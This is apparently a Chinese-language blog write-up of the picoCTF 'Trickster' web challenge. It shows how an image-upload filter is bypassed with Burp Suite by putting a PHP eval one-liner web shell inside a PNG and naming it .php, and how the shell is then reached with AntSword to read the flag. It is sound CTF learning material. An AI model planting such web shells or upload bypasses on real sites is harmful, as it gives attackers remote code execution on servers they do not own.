picoCTF-Web Exploitation-Trickster

Description

I found a web app that can help process images: PNG images only!

这应该是个上传漏洞了,十几年没用过了,不知道思路是不是一样的,以前的思路是通过上传漏洞想办法上传一个木马,拿到webshell,今天试试看能不能成功。

随便翻一翻源码没有找到什么有用的信息,只找到一个robots.txt(这还是最近才学到的给Google提供的map文件)
robots.txt发现如下信息

复制代码
User-agent: *
Disallow: /instructions.txt
Disallow: /uploads/

有一个/uploads/文件夹这里应该就是文件上传后的地址了

/instructions.txt文件信息如下,大意是提交时验证.png 扩展名,然后还要验证文件字节的正确性

复制代码
Let's create a web app for PNG Images processing.
It needs to:
Allow users to upload PNG images
look for ".png" extension in the submitted files
make sure the magic bytes match (not sure what this is exactly but wikipedia says that the first few bytes contain 'PNG' in hexadecimal: "50 4E 47" )
after validation, store the uploaded files so that the admin can retrieve them later and do the necessary processing.

那我i们就试一试,上传一个非png文件提示需要.png后缀,把非png文件后缀改为.png发现后端也有有文件头验证,可能这就是/instructions.txt 所说

随便制作一个png图片(直接截图保存),越小越好,便于我们查看修改文件信息,上传png图片

使用Burpsuite抓包,查看请求信息Content-Type: image/png 这应该就是后端的验证关键了吧

修改png文件信息,加上PHP一句话木马,修改一下filename后缀加上.php,(这里后缀的验证是前端js做的,用Burpsuite发送请求就不必考虑后缀的验证问题了)

如图返回上传成功

php 复制代码
<?php @eval($_POST['hucker']);?>

接下来我们使用中国蚁剑连接木马地址,以前用菜刀,管理webshell,爬取网站文件信息挺好用的,百度找到一个中国蚁剑就决定试试,看介绍好像也是根据菜刀改的。这种黑客软件最好是去github下载原版,可以验证MD5,毕竟是开源的东西,一般不会存在后门。

连接我们的木马,前面我们通过robots.txt看到文件上传目录是uploads,组合一下得到地址[http://atlas.picoctf.net:49226/uploads/2.png.php],输入密码hucker 连接

直接查看网站文件,找到一个GAZWIMLEGU2DQ.txt 里面就是flag了

相关推荐
q***99426 分钟前
IPV6公网暴露下的OPENWRT防火墙安全设置(只允许访问局域网中指定服务器指定端口其余拒绝)
服务器·安全·php
u***u6851 小时前
PHP在电商中的WooCommerce
开发语言·php
冠希陈、1 小时前
PHP 过滤敏感词(含类库)
开发语言·php·内容敏感词
白帽黑客-晨哥2 小时前
最适合零基础的渗透测试学习路径:理论+实战+就业,我在湖南网安基地实现了
学习·web安全·渗透测试·实战项目·就业·湖南网安基地
v***87042 小时前
QoS质量配置
开发语言·智能路由器·php
世界尽头与你3 小时前
CVE-2016-2183_ OpenSSL 信息泄露漏洞
网络安全·渗透测试
JaguarJack4 小时前
不用 Web 服务器也能跑 PHP?这事比你想的有意思
php·服务端
一生要强的ymy5 小时前
Polar PHP是世界上最好的语言(困难)
开发语言·php
白帽子黑客杰哥14 小时前
2025漏洞挖掘系统学习:从环境搭建到实战挖洞全流程
web安全·渗透测试·漏洞挖掘·网络安全就业
火白学安全19 小时前
《Python红队攻防零基础脚本编写:进阶篇(一)》
开发语言·python·安全·web安全·网络安全·系统安全